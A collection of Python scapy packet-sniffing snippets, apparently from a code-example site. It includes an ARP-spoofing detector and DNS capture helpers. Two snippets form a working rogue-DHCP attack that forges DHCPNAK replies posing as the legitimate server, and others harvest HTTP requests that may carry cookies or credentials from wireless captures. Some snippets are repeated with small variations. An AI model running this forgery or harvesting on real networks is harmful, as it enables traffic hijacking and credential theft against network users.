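def main():
    """Start passive ARP-spoofing detection on interface ``en0``.

    Stores the interface's IPv4 address and broadcast address in the
    module-level names ``local_ip`` and ``broadcast``, configures logging to
    ``spoof.log`` and then passes every captured ARP frame to ``getAdrress``
    (defined elsewhere in this file).

    Exits with an error message when the process is not running as root or
    when the interface's address information cannot be read.
    """
    global local_ip
    global broadcast

    # Live capture needs root. sys.exit() is used directly: the bare exit()
    # helper is injected by the site module and may be absent, and the
    # second exit call that used to follow it could never run.
    if os.geteuid() != 0:
        sys.exit("Need root permission")

    # NOTE(review): the log is opened in append mode, relative to the current
    # working directory, while running as root. Starting the tool from a
    # directory other users can write to would let a pre-planted symlink
    # named spoof.log redirect root's writes; an absolute path in a
    # root-owned directory avoids that.
    filename = "spoof.log"
    logging.basicConfig(filename=filename, filemode="a", level=logging.DEBUG)

    # Unicode literal instead of the Python 2-only unicode() builtin; the
    # resulting value is the same.
    interface = u"en0"
    try:
        # ifaddresses() raises ValueError for an unknown interface name; the
        # lookups raise KeyError when the interface has no IPv4 address or
        # no broadcast address.
        addrs = netifaces.ifaddresses(interface)
        ipv4 = addrs[netifaces.AF_INET][0]
        local_ip = ipv4["addr"]
        broadcast = ipv4["broadcast"]
    except (KeyError, ValueError):
        sys.exit("Cannot read address/broadcast address on interface {}".format(interface))

    logging.info("ARP Spoofing Detection Started on %s", local_ip)
    print("ARP Spoofing Detection Started.")
    # store=0: frames are handed to the callback and not kept in memory, so
    # a long-running detector does not grow without bound.
    scapy.sniff(filter="arp", prn=getAdrress, store=0)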
Example #2
def load_pcap():
	"""Collect HTTP GET/POST packets from the ``.dump`` captures under config.KismetPath.

	Every file whose path ends in ``.dump`` is read offline and filtered
	with ``is_http``. The matches are printed (last layer name and raw
	payload) and written to ``Packets.dump`` in the current directory.

	Handling note: the printed payloads and the output file hold raw HTTP
	request data, which may include cookies or credentials; treat both as
	sensitive.
	"""
	packets = scapy.PacketList()
	for root, dirs, filenames in os.walk(config.KismetPath):
		dump_paths = [os.path.join(root, name) for name in filenames]
		for dump_path in dump_paths:
			if dump_path.endswith('.dump'):
				matched = scapy.sniff(offline=dump_path, lfilter = is_http)
				packets.extend(matched)

	print 'Summary', packets.summary()
	for pkt in packets:
		print pkt.lastlayer().name, pkt.load
	scapy.wrpcap('Packets.dump', packets)
Example #3

# Spoof a DHCPNAK that appears to come from the legitimate DHCP server whenever the DHCP client sends a DHCPREQUEST.
def nak_request(pkt):
    """Send a forged DHCPNAK built from the DHCPREQUEST in ``pkt``.

    The source MAC and IP are taken from the module globals
    ``dhcp_server_mac`` and ``dhcp_server_ip``. The destination addresses,
    client hardware address and transaction id (``xid``) are copied from
    the request.

    Defensive note: nothing in the frame authenticates the sender. The
    control that stops this class of forgery is DHCP snooping on the
    access switches, which drops server-type DHCP messages arriving on
    untrusted ports.
    """
    settings = globals()
    legit_mac = settings['dhcp_server_mac']
    msg("Spoofing DHCPNAK from " + legit_mac, 2)
    legit_ip = settings['dhcp_server_ip']

    link = Ether(src=legit_mac, dst=pkt[Ether].dst)
    net = IP(src=legit_ip, dst=pkt[IP].dst)
    transport = UDP(sport=67, dport=68)
    bootp = BOOTP(op=2,
                  ciaddr=pkt[IP].src,
                  siaddr=pkt[IP].dst,
                  chaddr=pkt[Ether].src,
                  xid=pkt[BOOTP].xid)
    dhcp_options = [('server_id', legit_ip), ('message-type', 'nak'), 'end']
    sendp(link / net / transport / bootp / DHCP(options=dhcp_options))


# Discovery step: capture at most one UDP packet on port 67/68 that does not
# involve the address stored in globals()['illegal_dhcp_server_ip'], waiting
# no longer than one second. The packet is passed to get_dhcp_server (defined
# elsewhere), which presumably records 'dhcp_server_ip' in globals(), since
# the check below depends on that key.
sniff(filter="udp and not host " + globals()['illegal_dhcp_server_ip'] +
      " and (port 67 or 68)",
      prn=get_dhcp_server,
      store=0,
      count=1,
      timeout=1)

# Stop when the discovery step did not set 'dhcp_server_ip'.
# dict.has_key() exists only in Python 2.
if globals().has_key('dhcp_server_ip') == False:
    print("No other DHCP server found, exiting")
    sys.exit(0)

# Main loop: pass every ARP frame and every DHCP (UDP 67/68) packet to
# detect_dhcp_request. store=0 keeps packets out of memory; no count or
# timeout is given here.
sniff(filter="arp or (udp and (port 67 or 68))",
      prn=detect_dhcp_request,
      store=0)
Example #4
            nak_request(pkt)
        else:
            msg("Giving up on spoofing DHCPNAK's for " + pkt[Ether].src + ", failed " +
            str(globals()['limit']) + " times",2)
            del globals()['attempted_dhcpnaks'][pkt[Ether].src]
    if pkt[ARP] and pkt[ARP].op == 0x0002:
        if globals()['macs'].has_key(pkt[Ether].src) == True:
            if pkt[ARP].hwdst == globals()['illegal_dhcp_server_mac']:
                msg("Succes: DHCP client " + pkt[ARP].hwsrc + " obtained a lease for " +
                pkt[ARP].psrc + "from the illegal DHCP server",1) 
            elif pkt[ARP].hwdst == globals()['dhcp_server_mac']:
                msg("Failure: DHCP client " + pkt[ARP].hwsrc + " obtained a lease for " +
                pkt[ARP].psrc + " from the legit DHCP server",1) 
            del globals()['macs'][pkt[Ether].src]

# Spoof a DHCPNAK that appears to come from the legitimate DHCP server whenever the DHCP client sends a DHCPREQUEST.
def nak_request(pkt):
    """Answer the DHCPREQUEST in ``pkt`` with a forged DHCPNAK.

    Source addresses come from the module globals ``dhcp_server_mac`` and
    ``dhcp_server_ip``. Destination addresses, the client hardware address
    and the BOOTP transaction id are copied from the request itself.

    Defensive note: the reply carries no proof of origin, so detection and
    prevention belong at the switch. DHCP snooping rejects server replies
    that arrive on ports not marked as trusted.
    """
    module_state = globals()
    server_mac = module_state['dhcp_server_mac']
    msg("Spoofing DHCPNAK from " + server_mac, 2)
    server_ip = module_state['dhcp_server_ip']

    ether_layer = Ether(src=server_mac, dst=pkt[Ether].dst)
    ip_layer = IP(src=server_ip, dst=pkt[IP].dst)
    udp_layer = UDP(sport=67, dport=68)
    bootp_layer = BOOTP(
        op=2,
        ciaddr=pkt[IP].src,
        siaddr=pkt[IP].dst,
        chaddr=pkt[Ether].src,
        xid=pkt[BOOTP].xid,
    )
    dhcp_layer = DHCP(options=[
        ('server_id', server_ip),
        ('message-type', 'nak'),
        'end',
    ])
    sendp(ether_layer / ip_layer / udp_layer / bootp_layer / dhcp_layer)

# Discovery step: capture at most one UDP packet on port 67/68 that does not
# involve globals()['illegal_dhcp_server_ip'], with a one-second timeout, and
# pass it to get_dhcp_server (defined elsewhere). That callback presumably
# sets 'dhcp_server_ip' in globals(), since the check below depends on it.
sniff(filter="udp and not host " + globals()['illegal_dhcp_server_ip'] + " and (port 67 or 68)",
prn=get_dhcp_server, store=0, count=1, timeout=1)

# Exit when the discovery step did not set 'dhcp_server_ip'.
# dict.has_key() exists only in Python 2.
if globals().has_key('dhcp_server_ip') == False:
    print("No other DHCP server found, exiting")
    sys.exit(0)

# Main loop: every ARP frame and DHCP (UDP 67/68) packet goes to
# detect_dhcp_request. Packets are not stored, and no count or timeout is set.
sniff(filter="arp or (udp and (port 67 or 68))", prn=detect_dhcp_request, store=0)
Example #5
def main():
    """Capture one UDP port 53 (DNS) packet on ``eth0`` and pass it to procPacket."""
    scapy.sniff(
        iface="eth0",
        count=1,
        filter="udp port 53",
        prn=procPacket,
    )
Example #6
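def read_pcap(filepath, packets):
    """Replay the capture file at ``filepath`` through ``add_packet(packets)``.

    ``add_packet`` is defined elsewhere; it presumably returns a per-packet
    callback that records each packet in ``packets`` (confirm against its
    definition). Nothing is returned.
    """
    # store=0: the callback is the only consumer of the packets. By default
    # sniff() also keeps every packet in its own result list, which this
    # function discards. For a large or untrusted capture file that second
    # copy only raises peak memory.
    sniff(offline=filepath, prn=add_packet(packets), store=0)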
Example #7
def run_capture(interface, duration, packets):
    """Capture live traffic on ``interface`` for ``duration`` seconds.

    ``duration`` is converted with ``float()``, so numeric strings are
    accepted and anything else raises before the capture starts. Each packet
    goes to the callback returned by ``add_packet(packets)`` (defined
    elsewhere). ``store=0`` stops sniff() from keeping its own copy.
    """
    capture_seconds = float(duration)
    on_packet = add_packet(packets)
    sniff(iface=interface, timeout=capture_seconds, store=0, prn=on_packet)
Example #8
def main():
    """Sniff a single packet matching ``udp port 53`` on ``eth0``.

    The captured packet is passed to ``procPacket`` (defined elsewhere).
    """
    capture_options = {
        "iface": "eth0",
        "count": 1,
        "filter": "udp port 53",
        "prn": procPacket,
    }
    scapy.sniff(**capture_options)
Example #9
import os, scapy
import config

def is_http(p):
	"""Return True when ``p`` looks like an HTTP GET or POST request.

	A packet qualifies when it has a TCP layer, its ``dport`` is 80, it
	carries a Raw payload, and that payload starts with ``GET`` or ``POST``.
	Requests sent to any other port are not matched.
	"""
	if p.haslayer('TCP') and p.dport == 80 and p.haslayer('Raw'):
		# startswith() accepts a tuple of prefixes and returns a bool.
		return p.load.startswith(('GET', 'POST'))
	return False

# Gather the HTTP GET/POST packets from every .dump capture below
# config.KismetPath, reporting how many each file contributed.
packets = scapy.PacketList()
for root, dirs, filenames in os.walk(config.KismetPath):
	for file in filenames:
		filename = os.path.join(root, file)
		if filename.endswith('.dump'):
			new = scapy.sniff(offline=filename, lfilter = is_http)
			print 'new', len(new)
			packets.extend(new)

# Print each match (last layer name and raw payload) and save them all to
# Packets.dump in the current directory. The payloads are raw HTTP request
# data and may contain cookies or credentials, so treat the console output
# and the file as sensitive.
for p in packets:
	print p.lastlayer().name, p.load
scapy.wrpcap('Packets.dump', packets)
Example #10
def sniff_packet(interface):
    """Sniff on ``interface`` and pass each packet to ``process_packets``.

    No count or timeout is given. ``store=False`` keeps captured packets
    out of memory, so the callback (defined elsewhere) is the only consumer.
    """
    scapy.sniff(
        iface=interface,
        store=False,
        prn=process_packets,
    )
Example #11
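def read_pcap(filepath, packets):
    """Read the capture file at ``filepath``, passing each packet to a callback.

    The callback is whatever ``add_packet(packets)`` returns. ``add_packet``
    is defined elsewhere and presumably records each packet in ``packets``
    (confirm against its definition). Nothing is returned.
    """
    on_packet = add_packet(packets)
    # store=0: sniff() otherwise keeps its own list of every packet, which
    # this function never uses. Dropping that copy keeps peak memory down
    # when the capture file is large or comes from an untrusted source.
    sniff(offline=filepath, prn=on_packet, store=0)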
Example #12
def run_capture(interface, duration, packets):
    """Run a time-limited live capture on ``interface``.

    The capture stops after ``float(duration)`` seconds. Packets are passed
    to the callback returned by ``add_packet(packets)`` (defined elsewhere)
    and, because ``store=0``, are not also kept by sniff() itself.
    """
    sniff_kwargs = {
        "iface": interface,
        "timeout": float(duration),
        "store": 0,
        "prn": add_packet(packets),
    }
    sniff(**sniff_kwargs)